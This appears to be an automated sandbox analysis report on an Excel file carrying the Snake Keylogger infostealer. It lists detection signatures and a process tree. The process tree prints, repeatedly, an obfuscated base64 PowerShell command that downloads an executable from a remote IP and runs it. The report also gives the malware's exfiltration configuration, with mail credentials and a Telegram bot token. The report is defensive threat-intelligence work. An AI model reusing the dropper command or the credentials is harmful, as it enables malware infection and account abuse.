Edit tour
Windows
Analysis Report
SYSN ORDER.xls
Overview
General Information
Detection
Snake Keylogger
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3344 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3624 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3712 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwerS HELL -eX BypASs -NoP -w 1 -c DevicecRE dENtIalDep LoYMent.Ex e ; ieX( $(ieX('[sy StEM.texT. encOdiNg]' +[ChaR]0x3 A+[cHAr]0x 3a+'UtF8.g eTStriNG([ SYsTEm.con VeRT]'+[Ch ar]58+[CHA R]58+'From BAse64STri NG('+[chaR ]34+'JFltI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEF kRC10WVBlI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLU1FTWJ FckRlZmluS XRJb24gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA nW0RsbEltc G9ydCgiVXJ MbW9uLmRMb CIsICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQ2h hclNldCA9I ENoYXJTZXQ uVW5pY29kZ SldcHVibGl jIHN0YXRpY yBleHRlcm4 gSW50UHRyI FVSTERvd25 sb2FkVG9Ga WxlKEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIFpVc Xgsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWGV0d VN2RXMsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgV mVsLHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBudEUsS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gTGtQZERQK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 hbWUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAiT VAiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 hbUVTUGFDR SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGNJbGF mR2lhYnZyI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRZbTo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzE3Mi4 yNDUuMTIzL jYvNzcwL2R sbGhvc3QuZ XhlIiwiJEV OdjpBUFBEQ VRBXGRsbGh vc3QuZXhlI iwwLDApO3N UQXJ0LXNsZ UVwKDMpO1N 0QVJUICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI iRlTlY6QVB QREFUQVxkb Gxob3N0LmV 4ZSI='+[ch AR]0X22+') )')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3736 cmdline:
POwerSHELL -eX Byp ASs -NoP -w 1 -c Dev icecREdENt IalDepLoYM ent.Exe ; ieX($(ie X('[syStEM .texT.encO diNg]'+[Ch aR]0x3A+[c HAr]0x3a+' UtF8.geTSt riNG([SYsT Em.conVeRT ]'+[Char]5 8+[CHAR]58 +'FromBAse 64STriNG(' +[chaR]34+ 'JFltICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgP SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFkRC1 0WVBlICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U1FTWJFckR lZmluSXRJb 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVXJMbW9 uLmRMbCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQ2hhclN ldCA9IENoY XJTZXQuVW5 pY29kZSldc HVibGljIHN 0YXRpYyBle HRlcm4gSW5 0UHRyIFVST ERvd25sb2F kVG9GaWxlK EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFpVcXgsc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gWGV0dVN2R XMsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgVmVsL HVpbnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB udEUsSW50U HRyICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgTGt QZERQKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5hbWU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiTVAiI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5hbUV TUGFDRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI GNJbGFmR2l hYnZyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL VBhc3NUaHJ 1OyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICRZb To6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zE3Mi4yNDU uMTIzLjYvN zcwL2RsbGh vc3QuZXhlI iwiJEVOdjp BUFBEQVRBX GRsbGhvc3Q uZXhlIiwwL DApO3NUQXJ 0LXNsZUVwK DMpO1N0QVJ UICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIiRlT lY6QVBQREF UQVxkbGxob 3N0LmV4ZSI ='+[chAR]0 X22+'))')) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 3844 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\ngxpd0 hb\ngxpd0h b.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3852 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES4348.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\ngx pd0hb\CSCA 3EB236CC00 F4C599499B BB2E0A3996 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - dllhost.exe (PID: 3944 cmdline:
"C:\Users\ user\AppDa ta\Roaming \dllhost.e xe" MD5: 7F0098DCC054A27F80296ADF300573EC) - RegSvcs.exe (PID: 3108 cmdline:
"C:\Users\ user\AppDa ta\Roaming \dllhost.e xe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC) - mshta.exe (PID: 3996 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 2672 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwerS HELL -eX BypASs -NoP -w 1 -c DevicecRE dENtIalDep LoYMent.Ex e ; ieX( $(ieX('[sy StEM.texT. encOdiNg]' +[ChaR]0x3 A+[cHAr]0x 3a+'UtF8.g eTStriNG([ SYsTEm.con VeRT]'+[Ch ar]58+[CHA R]58+'From BAse64STri NG('+[chaR ]34+'JFltI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgPSAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEF kRC10WVBlI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLU1FTWJ FckRlZmluS XRJb24gICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA nW0RsbEltc G9ydCgiVXJ MbW9uLmRMb CIsICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQ2h hclNldCA9I ENoYXJTZXQ uVW5pY29kZ SldcHVibGl jIHN0YXRpY yBleHRlcm4 gSW50UHRyI FVSTERvd25 sb2FkVG9Ga WxlKEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIFpVc Xgsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgWGV0d VN2RXMsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgV mVsLHVpbnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICBudEUsS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gTGtQZERQK TsnICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 hbWUgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAiT VAiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLW5 hbUVTUGFDR SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIGNJbGF mR2lhYnZyI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRZbTo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzE3Mi4 yNDUuMTIzL jYvNzcwL2R sbGhvc3QuZ XhlIiwiJEV OdjpBUFBEQ VRBXGRsbGh vc3QuZXhlI iwwLDApO3N UQXJ0LXNsZ UVwKDMpO1N 0QVJUICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI iRlTlY6QVB QREFUQVxkb Gxob3N0LmV 4ZSI='+[ch AR]0X22+') )')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 2108 cmdline:
POwerSHELL -eX Byp ASs -NoP -w 1 -c Dev icecREdENt IalDepLoYM ent.Exe ; ieX($(ie X('[syStEM .texT.encO diNg]'+[Ch aR]0x3A+[c HAr]0x3a+' UtF8.geTSt riNG([SYsT Em.conVeRT ]'+[Char]5 8+[CHAR]58 +'FromBAse 64STriNG(' +[chaR]34+ 'JFltICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgP SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIEFkRC1 0WVBlICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL U1FTWJFckR lZmluSXRJb 24gICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAnW0R sbEltcG9yd CgiVXJMbW9 uLmRMbCIsI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgQ2hhclN ldCA9IENoY XJTZXQuVW5 pY29kZSldc HVibGljIHN 0YXRpYyBle HRlcm4gSW5 0UHRyIFVST ERvd25sb2F kVG9GaWxlK EludFB0ciA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIFpVcXgsc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gWGV0dVN2R XMsc3RyaW5 nICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgVmVsL HVpbnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB udEUsSW50U HRyICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgTGt QZERQKTsnI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5hbWU gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiTVAiI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLW5hbUV TUGFDRSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI GNJbGFmR2l hYnZyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL VBhc3NUaHJ 1OyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICRZb To6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zE3Mi4yNDU uMTIzLjYvN zcwL2RsbGh vc3QuZXhlI iwiJEVOdjp BUFBEQVRBX GRsbGhvc3Q uZXhlIiwwL DApO3NUQXJ 0LXNsZUVwK DMpO1N0QVJ UICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIiRlT lY6QVBQREF UQVxkbGxob 3N0LmV4ZSI ='+[chAR]0 X22+'))')) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 1692 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\tnesdt 30\tnesdt3 0.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 1976 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES866F.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\tne sdt30\CSC4 AC68FDA20F 44DF3BBC22 D1FFF1AFB9 .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - dllhost.exe (PID: 1960 cmdline:
"C:\Users\ user\AppDa ta\Roaming \dllhost.e xe" MD5: 7F0098DCC054A27F80296ADF300573EC) - RegSvcs.exe (PID: 3176 cmdline:
"C:\Users\ user\AppDa ta\Roaming \dllhost.e xe" MD5: 19855C0DC5BEC9FDF925307C57F9F5FC)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "Telegram", "Username": "teilecar@teilecar.com", "Password": "Manta924porsche=911", "Host": "mail.teilecar.com", "Port": "587", "Token": "7999924339:AAGXruqvzq9xMXJCD4qt4gTPOUJ8WiZw7pY", "Chat_id": "6183379562", "Version": "5.1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 9 entries |
System Summary |
---|
Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |